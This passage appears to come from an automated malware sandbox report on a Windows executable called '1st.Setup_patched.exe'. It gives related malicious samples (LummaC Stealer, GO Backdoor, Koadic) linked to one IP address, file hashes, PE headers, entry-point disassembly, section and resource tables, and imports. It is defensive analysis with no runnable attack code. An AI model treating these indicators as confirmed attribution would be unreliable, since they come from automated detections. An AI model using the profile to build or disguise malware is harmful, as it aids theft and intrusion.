                                                                          SecuriteInfo.com.FileRepMalware.5979.10698.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          Nepomuk.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                                                                          • 104.21.13.126
                                                                          RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                                                                          • 104.21.13.126
                                                                          No context
                                                                          No created / dropped files found
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.049752194222297
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:1st.Setup_patched.exe
                                                                          File size:2'610'176 bytes
                                                                          MD5:2154ece4944b0f4cba3f7d2e51b84ca3
                                                                          SHA1:e0b92429b8fbca2f4ac6dbde773bd6c1aee0d720
                                                                          SHA256:d469e0ee5af5bab895b2dd07f0808ce4c8bc959da5e39f3529b705e469eff268
                                                                          SHA512:ae3177c46430aa1a3bf17757e1dcd266e5af3611cc8433a80c5d6f34ce27085d91f594accf75b07d899116c9a32850273669600bbb6a1a3d0f73c649242e144b
                                                                          SSDEEP:49152:/jlRQE4EnWZhKTcNe5DvTP/7P8auY4rB5w8PjkMgKC+KcWWdXThsE:/T90Cp4rg81Ths
                                                                          TLSH:FEC58EB03BD3847DD6752970483C670DD4A86E5E5BA184CBD24C3E4D8D34AF2A93AE36
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........../...|...|...|B.C|...|B.A|...|B.@|b..|...|...|...|...|...|...|...|'..|q)]|...|q)G|...|...|...|q)B|...|Rich...|...............
                                                                          Icon Hash:4570d4d4e068c6f8
                                                                          Entrypoint:0x4cea68
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x56B09BA2 [Tue Feb 2 12:05:54 2016 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:715840ee89b34b066ce8f890bc28e4eb
                                                                          Instruction
                                                                          call 00007FCE80B2F700h
                                                                          jmp 00007FCE80B258D4h
                                                                          jmp 00007FCE80B285DCh
                                                                          cmp ecx, dword ptr [00541488h]
                                                                          jne 00007FCE80B25A54h
                                                                          rep ret
                                                                          jmp 00007FCE80B28241h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          mov eax, dword ptr [ebp+14h]
                                                                          push esi
                                                                          test eax, eax
                                                                          je 00007FCE80B25A8Eh
                                                                          cmp dword ptr [ebp+08h], 00000000h
                                                                          jne 00007FCE80B25A65h
                                                                          call 00007FCE80B29BACh
                                                                          push 00000016h
                                                                          pop esi
                                                                          mov dword ptr [eax], esi
                                                                          call 00007FCE80B2FB9Fh
                                                                          mov eax, esi
                                                                          jmp 00007FCE80B25A77h
                                                                          cmp dword ptr [ebp+10h], 00000000h
                                                                          je 00007FCE80B25A39h
                                                                          cmp dword ptr [ebp+0Ch], eax
                                                                          jnc 00007FCE80B25A5Bh
                                                                          call 00007FCE80B29B8Eh
                                                                          push 00000022h
                                                                          jmp 00007FCE80B25A32h
                                                                          push eax
                                                                          push dword ptr [ebp+10h]
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007FCE80B25C5Bh
                                                                          add esp, 0Ch
                                                                          xor eax, eax
                                                                          pop esi
                                                                          pop ebp
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push dword ptr [ebp+0Ch]
                                                                          push 00000000h
                                                                          push dword ptr [ebp+08h]
                                                                          push 004D8D78h
                                                                          call 00007FCE80B28F76h
                                                                          add esp, 10h
                                                                          pop ebp
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FCE80B25AB4h
                                                                          mov dword ptr [esi], 00509958h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FCE80B25AB4h
                                                                          mov dword ptr [esi], 00509958h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FCE80B25AF5h
                                                                          Programming Language:
                                                                          • [C++] VS2008 SP1 build 30729
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [RES] VS2012 UPD3 build 60610
                                                                          • [LNK] VS2012 UPD3 build 60610
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x13e0740x168.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1510000xcfc61.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2210000x1209c.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x107a900x38.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11fdc80x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1070000x63c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x1058f90x105a003e925f0f494fd1c5df00fc026faace3dFalse0.42485087941949357data6.498235920117055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x1070000x392c40x3940018a304e3af6ba740db2329ce3cfc3ad8False0.3665819459606987data4.756575039188626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x1410000xfe4c0xcc00967fb368d2f6949aa4248aad8a840bdcFalse0.1726983762254902data5.384939205602996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x1510000xcfc610xcfe00dcb911ab3706781efd4182ee90c39727False0.5120522963018641data7.070970923829321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x2210000x618000x618003ff368f1e6dbd605730a8f855848d714False0.8038837139423077data7.479128945037122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          GIF0x1543e00x1950GIF image data, version 89a, 156 x 1561.0016975308641975
                                                                          GIF0x155d300x730GIF image data, version 89a, 48 x 481.0059782608695653
                                                                          GIF0x1564600x3dbGIF image data, version 89a, 16 x 160.6524822695035462
                                                                          GIF0x15683c0x5aGIF image data, version 89a, 48 x 481.0555555555555556
                                                                          GIF0x1568980x166GIF image data, version 89a, 50 x 80.840782122905028
                                                                          GIF0x156a000x175GIF image data, version 89a, 50 x 80.9812332439678284
                                                                          GIF0x156b780x184GIF image data, version 89a, 50 x 81.0283505154639174
                                                                          GIF0x156cfc0x262GIF image data, version 89a, 50 x 80.7377049180327869
                                                                          GIF0x156f600x26fGIF image data, version 89a, 50 x 80.7752808988764045
                                                                          GIF0x1571d00x269GIF image data, version 89a, 50 x 80.7682333873581848
                                                                          GIF0x15743c0x166GIF image data, version 89a, 50 x 80.840782122905028
                                                                          GIF0x1575a40x179GIF image data, version 89a, 50 x 80.9124668435013262
                                                                          GIF0x1577200x17cGIF image data, version 89a, 50 x 80.9131578947368421
                                                                          GIF0x15789c0x17bGIF image data, version 89a, 50 x 80.9102902374670184
                                                                          GIF0x157a180x177GIF image data, version 89a, 50 x 80.912
                                                                          GIF0x157b900xfdGIF image data, version 89a, 50 x 81.0434782608695652
                                                                          GIF0x157c900x26fGIF image data, version 89a, 16 x 160.913322632423756
                                                                          GIF0x157f000x20d8GIF image data, version 89a, 156 x 1560.9936964795432921
                                                                          GIF0x159fd80x2036GIF image data, version 89a, 156 x 1560.9929662866844531
                                                                          GIF0x15c0100x1f64GIF image data, version 89a, 156 x 1560.9930313588850174
                                                                          GIF0x15df740x1f00GIF image data, version 89a, 156 x 1560.9936995967741935
                                                                          GIF0x15fe740x1f36GIF image data, version 89a, 156 x 1560.995369211514393
                                                                          GIF0x161dac0x205aGIF image data, version 89a, 156 x 1560.9937213233518474
                                                                          GIF0x163e080x2099GIF image data, version 89a, 156 x 1560.9938885560215698
                                                                          GIF0x165ea40xb7GIF image data, version 89a, 16 x 161.010928961748634
                                                                          GIF0x165f5c0x242GIF image data, version 89a, 16 x 160.8806228373702422
                                                                          GIF0x1661a00x6c3GIF image data, version 89a, 48 x 480.6920854997111496
                                                                          GIF0x1668640x45fGIF image data, version 89a, 48 x 480.8793565683646113
                                                                          GIF0x166cc40x319GIF image data, version 89a, 32 x 320.9243379571248423
                                                                          GIF0x166fe00x539GIF image data, version 89a, 32 x 320.9603590127150337
                                                                          GIF0x16751c0x278GIF image data, version 89a, 22 x 220.935126582278481
                                                                          GIF0x1677940x155GIF image data, version 89a, 26 x 220.8357771260997068
                                                                          GIF0x1678ec0xebGIF image data, version 89a, 26 x 221.0170212765957447
                                                                          GIF0x1679d80x86GIF image data, version 89a, 26 x 220.9104477611940298
                                                                          GIF0x167a600x1a6GIF image data, version 89a, 26 x 220.9786729857819905
                                                                          GIF0x167c080x17aGIF image data, version 89a, 26 x 220.8465608465608465
                                                                          GIF0x167d840x98GIF image data, version 89a, 26 x 220.9144736842105263
                                                                          GIF0x167e1c0x537GIF image data, version 89a, 48 x 480.954307116104869
                                                                          GIF0x1683540x3b57GIF image data, version 89a, 220 x 2601.000724112961622
                                                                          GIF0x16beac0xfdbGIF image data, version 89a, 120 x 500.9519586104951958
                                                                          GIF0x16ce880x208GIF image data, version 89a, 100 x 100.9865384615384616
                                                                          GIF0x16d0900x1b8GIF image data, version 89a, 100 x 100.9931818181818182
                                                                          GIF0x16d2480x482GIF image data, version 89a, 22 x 220.8708838821490468
                                                                          GIF0x16d6cc0x4daGIF image data, version 89a, 56 x 480.8768115942028986
                                                                          GIF0x16dba80x297GIF image data, version 89a, 22 x 210.7481146304675717
                                                                          GIF0x16de400x2c8GIF image data, version 89a, 56 x 480.773876404494382
                                                                          GIF0x16e1080x45bGIF image data, version 89a, 22 x 210.7273542600896861
                                                                          GIF0x16e5640x49bGIF image data, version 89a, 56 x 480.7421543681085666
                                                                          GIF0x16ea000x30eGIF image data, version 89a, 22 x 220.8925831202046036
                                                                          GIF0x16ed100x4e8GIF image data, version 89a, 56 x 480.8519108280254777
                                                                          GIF0x16f1f80x2b4GIF image data, version 89a, 20 x 210.9407514450867052
                                                                          GIF0x16f4ac0x2e1GIF image data, version 89a, 56 x 480.9538670284938942
                                                                          GIF0x16f7900x466GIF image data, version 89a, 22 x 210.7628774422735346
                                                                          GIF0x16fbf80x4baGIF image data, version 89a, 56 x 480.7760330578512397
                                                                          GIF0x1700b40x49eGIF image data, version 89a, 22 x 210.8510998307952623
                                                                          GIF0x1705540x4ecGIF image data, version 89a, 56 x 480.8603174603174604
                                                                          GIF0x170a400x68dfGIF image data, version 89a, 599 x 3891.000595969754535
                                                                          GIF0x1773200xf5eGIF image data, version 89a, 156 x 1560.9560244026436198
                                                                          PNG0x1782800x2eacPNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9768162035487111
                                                                          PNG0x17b12c0xefcPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced0.9324817518248175
                                                                          PNG0x17c0280x689PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced0.826658696951584
                                                                          PNG0x17c6b40xa4PNG image data, 48 x 48, 1-bit colormap, non-interlaced0.9390243902439024
                                                                          PNG0x17c7580x4b5PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7120331950207469
                                                                          PNG0x17cc100x4d7PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7223567393058918
                                                                          PNG0x17d0e80x4f1PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7256916996047431
                                                                          PNG0x17d5dc0x503PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7326578332034295
                                                                          PNG0x17dae00x502PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.733229329173167
                                                                          PNG0x17dfe40x504PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7328660436137072
                                                                          PNG0x17e4e80x4b5PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.703734439834025
                                                                          PNG0x17e9a00x4bePNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7158154859967051
                                                                          PNG0x17ee600x4d8PNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7217741935483871
                                                                          PNG0x17f3380x4ddPNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7269076305220884
                                                                          PNG0x17f8180x4cbPNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.7188264058679706
                                                                          PNG0x17fce40x4abPNG image data, 50 x 8, 8-bit/color RGBA, non-interlaced0.700418410041841
                                                                          PNG0x1801900x665PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced0.8002443494196702
                                                                          PNG0x1807f80x3951PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9825529884822463
                                                                          PNG0x18414c0x3910PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9828176341730559
                                                                          PNG0x187a5c0x36acPNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9822806516147471
                                                                          PNG0x18b1080x35daPNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9820832728855361
                                                                          PNG0x18e6e40x3632PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9819806832924896
                                                                          PNG0x191d180x38b5PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.982916580560722
                                                                          PNG0x1955d00x3932PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9826526430815462
                                                                          PNG0x198f040x4c7PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced0.7440719542109566
                                                                          PNG0x1993cc0x57cPNG image data, 16 x 16, 8-bit/color RGB, non-interlaced0.7841880341880342
                                                                          PNG0x1999480xafdPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced0.9047280483469605
                                                                          PNG0x19a4480x9d6PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced0.8776806989674345
                                                                          PNG0x19ae200x811PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced0.85181598062954
                                                                          PNG0x19b6340x914PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced0.867039586919105
                                                                          PNG0x19bf480x5f7PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced0.8048461034708579
                                                                          PNG0x19c5400x62cPNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.7917721518987342
                                                                          PNG0x19cb6c0x598PNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.7625698324022346
                                                                          PNG0x19d1040x4c1PNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.7140509449465899
                                                                          PNG0x19d5c80x73ePNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.8295577130528586
                                                                          PNG0x19dd080x64ePNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.8265179677819083
                                                                          PNG0x19e3580x45dPNG image data, 26 x 22, 8-bit/color RGBA, non-interlaced0.675022381378693
                                                                          PNG0x19e7b80xc62PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced0.9167192429022082
                                                                          PNG0x19f41c0x9482PNG image data, 220 x 260, 8-bit/color RGBA, non-interlaced0.9936082908096165
                                                                          PNG0x1a88a00xbd8PNG image data, 120 x 50, 8-bit/color RGBA, non-interlaced0.9112796833773087
                                                                          PNG0x1a94780x47dPNG image data, 100 x 10, 8-bit/color RGBA, non-interlaced0.731940818102698
                                                                          PNG0x1a98f80x489PNG image data, 100 x 10, 8-bit/color RGBA, non-interlaced0.7260981912144703
                                                                          PNG0x1a9d840xb1aPNG image data, 6 x 6, 8-bit/color RGBA, non-interlaced1.0038705137227304
                                                                          PNG0x1aa8a00x4c6PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced1.0090016366612111
                                                                          PNG0x1aad680x8b8PNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8575268817204301
                                                                          PNG0x1ab6200x2a5PNG image data, 22 x 21, 8-bit gray+alpha, non-interlaced1.016248153618907
                                                                          PNG0x1ab8c80x779PNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.832723470987977
                                                                          PNG0x1ac0440x415PNG image data, 22 x 21, 8-bit colormap, non-interlaced0.9732057416267943
                                                                          PNG0x1ac45c0x84bPNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8487988695242581
                                                                          PNG0x1acca80x562PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced1.0079825834542815
                                                                          PNG0x1ad20c0x96bPNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8664454583160515
                                                                          PNG0x1adb780x349PNG image data, 20 x 21, 8-bit colormap, non-interlaced0.990487514863258
                                                                          PNG0x1adec40x75bPNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8327137546468402
                                                                          PNG0x1ae6200x463PNG image data, 22 x 21, 8-bit colormap, non-interlaced0.9510240427426536
                                                                          PNG0x1aea840x7fcPNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8449119373776908
                                                                          PNG0x1af2800x4ddPNG image data, 22 x 21, 8-bit colormap, non-interlaced0.946987951807229
                                                                          PNG0x1af7600x8cePNG image data, 56 x 48, 8-bit/color RGBA, non-interlaced0.8553682342502218
                                                                          PNG0x1b00300xd622PNG image data, 599 x 389, 8-bit/color RGBA, non-interlaced0.9450180597613922
                                                                          PNG0x1bd6540x1d31PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced0.9660109728355413
                                                                          RT_ICON0x1bf3880x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.09283368346302927
                                                                          RT_ICON0x2013b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.16344788832367207
                                                                          RT_ICON0x211bd80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.35269709543568467
                                                                          RT_ICON0x2141800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.48850844277673544
                                                                          RT_ICON0x2152280x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7606382978723404
                                                                          RT_ICON0x2156900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088, resolution 2835 x 2835 px/m0.449468085106383
                                                                          RT_ICON0x215af80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088, resolution 2835 x 2835 px/m0.5567375886524822
                                                                          RT_MENU0x215f600xaadataEnglishUnited States0.6705882352941176
                                                                          RT_STRING0x21600c0x36data0.5925925925925926
                                                                          RT_STRING0x2160440x3d2dataArabicSaudi Arabia0.4611451942740286
                                                                          RT_STRING0x2164180x476dataDanishDenmark0.4194395796847636
                                                                          RT_STRING0x2168900x51edataGermanGermany0.36793893129770994
                                                                          RT_STRING0x216db00x656dataEnglishUnited States0.3711467324290999
                                                                          RT_STRING0x2174080x4f8dataSpanishSpain0.3812893081761006
                                                                          RT_STRING0x2179000x4dedataFrenchFrance0.3924558587479936
                                                                          RT_STRING0x217de00x494dataDutchNetherlands0.40273037542662116
                                                                          RT_STRING0x2182740x442dataNorwegianNorway0.4073394495412844
                                                                          RT_STRING0x2186b80x46edataEnglishGreat Britain0.4012345679012346
                                                                          RT_STRING0x218b280x1dcdataArabicSaudi Arabia0.5441176470588235
                                                                          RT_STRING0x218d040x224dataDanishDenmark0.5164233576642335
                                                                          RT_STRING0x218f280x2b0dataGermanGermany0.45348837209302323
                                                                          RT_STRING0x2191d80x254dataEnglishUnited States0.4446308724832215
                                                                          RT_STRING0x21942c0x274dataSpanishSpain0.4585987261146497
                                                                          RT_STRING0x2196a00x26edataFrenchFrance0.47106109324758844
                                                                          RT_STRING0x2199100x232dataDutchNetherlands0.47686832740213525
                                                                          RT_STRING0x219b440x20cdataNorwegianNorway0.5057251908396947
                                                                          RT_STRING0x219d500x220dataEnglishGreat Britain0.4742647058823529
                                                                          RT_STRING0x219f700x54dataArabicSaudi Arabia0.6666666666666666
                                                                          RT_STRING0x219fc40x5adataDanishDenmark0.5555555555555556
                                                                          RT_STRING0x21a0200x62dataGermanGermany0.5714285714285714
                                                                          RT_STRING0x21a0840x5adataEnglishUnited States0.6111111111111112
                                                                          RT_STRING0x21a0e00x5adataSpanishSpain0.6
                                                                          RT_STRING0x21a13c0x62dataFrenchFrance0.5408163265306123
                                                                          RT_STRING0x21a1a00x58dataDutchNetherlands0.5909090909090909
                                                                          RT_STRING0x21a1f80x5edataNorwegianNorway0.5957446808510638
                                                                          RT_STRING0x21a2580x5adataEnglishGreat Britain0.6111111111111112
                                                                          RT_STRING0x21a2b40x4cdataArabicSaudi Arabia0.6842105263157895
                                                                          RT_STRING0x21a3000x62dataDanishDenmark0.5714285714285714
                                                                          RT_STRING0x21a3640x6cdataGermanGermany0.5925925925925926
                                                                          RT_STRING0x21a3d00x5edataEnglishUnited States0.6276595744680851
                                                                          RT_STRING0x21a4300x62dataSpanishSpain0.5816326530612245
                                                                          RT_STRING0x21a4940x62dataFrenchFrance0.5816326530612245
                                                                          RT_STRING0x21a4f80x68dataDutchNetherlands0.5384615384615384
                                                                          RT_STRING0x21a5600x66dataNorwegianNorway0.5588235294117647
                                                                          RT_STRING0x21a5c80x5edataEnglishGreat Britain0.6276595744680851
                                                                          RT_STRING0x21a6280x336Matlab v4 mat-file (little endian) *\006E\006 , numeric, rows 0, columns 0ArabicSaudi Arabia0.36009732360097324
                                                                          RT_STRING0x21a9600x38cMatlab v4 mat-file (little endian) e, numeric, rows 0, columns 0DanishDenmark0.35462555066079293
                                                                          RT_STRING0x21acec0x47aMatlab v4 mat-file (little endian) n, numeric, rows 0, columns 0GermanGermany0.3586387434554974
                                                                          RT_STRING0x21b1680x3b6Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.3547368421052632
                                                                          RT_STRING0x21b5200x3ceMatlab v4 mat-file (little endian) e, numeric, rows 0, columns 0SpanishSpain0.3531827515400411
                                                                          RT_STRING0x21b8f00x3e6Matlab v4 mat-file (little endian) \351, numeric, rows 0, columns 0FrenchFrance0.3697394789579158
                                                                          RT_STRING0x21bcd80x3b2Matlab v4 mat-file (little endian) o, numeric, rows 0, columns 0DutchNetherlands0.35306553911205074
                                                                          RT_STRING0x21c08c0x34aMatlab v4 mat-file (little endian) o, numeric, rows 0, columns 0NorwegianNorway0.34085510688836107
                                                                          RT_STRING0x21c3d80x392Matlab v4 mat-file (little endian) e, numeric, rows 0, columns 0EnglishGreat Britain0.34573304157549234
                                                                          RT_STRING0x21c76c0x1f4dataArabicSaudi Arabia0.456
                                                                          RT_STRING0x21c9600x2d2dataDanishDenmark0.3684210526315789
                                                                          RT_STRING0x21cc340x2dedataGermanGermany0.35149863760217986
                                                                          RT_STRING0x21cf140x328dataSpanishSpain0.33044554455445546
                                                                          RT_STRING0x21d23c0x33adataFrenchFrance0.32566585956416466
                                                                          RT_STRING0x21d5780x31adataDutchNetherlands0.3060453400503778
                                                                          RT_STRING0x21d8940x2dcdataNorwegianNorway0.3360655737704918
                                                                          RT_STRING0x21db700x2b4dataEnglishGreat Britain0.3554913294797688
                                                                          RT_STRING0x21de240x24adataArabicSaudi Arabia0.44880546075085326
                                                                          RT_STRING0x21e0700x310dataDanishDenmark0.3711734693877551
                                                                          RT_STRING0x21e3800x38edataGermanGermany0.34945054945054943
                                                                          RT_STRING0x21e7100x388dataSpanishSpain0.33517699115044247
                                                                          RT_STRING0x21ea980x39adataFrenchFrance0.35032537960954446
                                                                          RT_STRING0x21ee340x3b8dataDutchNetherlands0.3077731092436975
                                                                          RT_STRING0x21f1ec0x34cdataNorwegianNorway0.3234597156398104
                                                                          RT_STRING0x21f5380x2e4dataEnglishGreat Britain0.35945945945945945
                                                                          RT_GROUP_ICON0x21f81c0x4cdata0.7894736842105263
                                                                          RT_GROUP_ICON0x21f8680x14data1.25
                                                                          RT_GROUP_ICON0x21f87c0x14data1.25
                                                                          RT_VERSION0x21f8900x2dcdata0.46311475409836067
                                                                          RT_HTML0x21fb6c0x744HTML document, ASCII text0.432258064516129
                                                                          RT_HTML0x2202b00x412HTML document, ASCII text, with CRLF, LF line terminators0.5854126679462572
                                                                          RT_MANIFEST0x2206c40x59dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishGreat Britain0.430062630480167
                                                                          DLLImport
                                                                          KERNEL32.dllGetCurrentDirectoryW, GetLocalTime, GetCurrentProcessId, CreateDirectoryW, CreateProcessW, DeleteFileW, GetComputerNameW, GetVersionExW, GetModuleHandleExW, GetModuleFileNameW, SetThreadPriority, FindFirstFileW, FindClose, FindNextFileW, FreeLibrary, EndUpdateResourceW, LoadLibraryW, BeginUpdateResourceW, UpdateResourceW, GlobalFree, MoveFileExW, WriteFile, ReadFile, CopyFileW, GetFileAttributesW, GetFileSizeEx, MoveFileW, GetFileType, RemoveDirectoryW, DuplicateHandle, VirtualQuery, OpenProcess, GetExitCodeProcess, SetEndOfFile, SetFilePointerEx, FormatMessageW, GetDriveTypeW, LCMapStringW, HeapAlloc, HeapFree, GetProcessHeap, SetLastError, GetTempFileNameW, GetTempPathW, ExpandEnvironmentStringsW, ResumeThread, FlushInstructionCache, RaiseException, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, GlobalUnlock, ExpandEnvironmentStringsA, LoadLibraryA, SleepEx, WaitForSingleObjectEx, WaitNamedPipeW, ReadFileEx, CancelIo, WriteFileEx, GetStringTypeW, GetFileInformationByHandle, DecodePointer, HeapDestroy, HeapReAlloc, HeapSize, InterlockedCompareExchange, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, GetCommandLineW, IsDebuggerPresent, GetLogicalDrives, GetSystemInfo, VirtualProtect, GetTimeZoneInformation, FileTimeToLocalFileTime, FindFirstFileExW, FileTimeToSystemTime, CreateThread, ExitThread, LoadLibraryExW, ExitProcess, RtlUnwind, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetDateFormatW, GetTimeFormatW, CompareStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetStdHandle, QueryPerformanceCounter, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsValidCodePage, GetACP, GetOEMCP, PeekNamedPipe, GetFullPathNameW, OutputDebugStringW, GetConsoleCP, GetConsoleMode, SetStdHandle, ReadConsoleW, WriteConsoleW, SetEnvironmentVariableA, FlushFileBuffers, GetThreadTimes, GetSystemTimeAsFileTime, GetCurrentThread, GetCurrentProcess, GetProcessIoCounters, WideCharToMultiByte, WaitForSingleObject, EncodePointer, CreateFileW, CloseHandle, GetCurrentThreadId, WaitForMultipleObjects, CreateEventW, EnterCriticalSection, GetProcAddress, LeaveCriticalSection, Sleep, GetModuleHandleW, SetEvent, DeleteCriticalSection, LockResource, GetLastError, MultiByteToWideChar, SizeofResource, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, LoadResource, FindResourceW, LocalFree, FindResourceExW
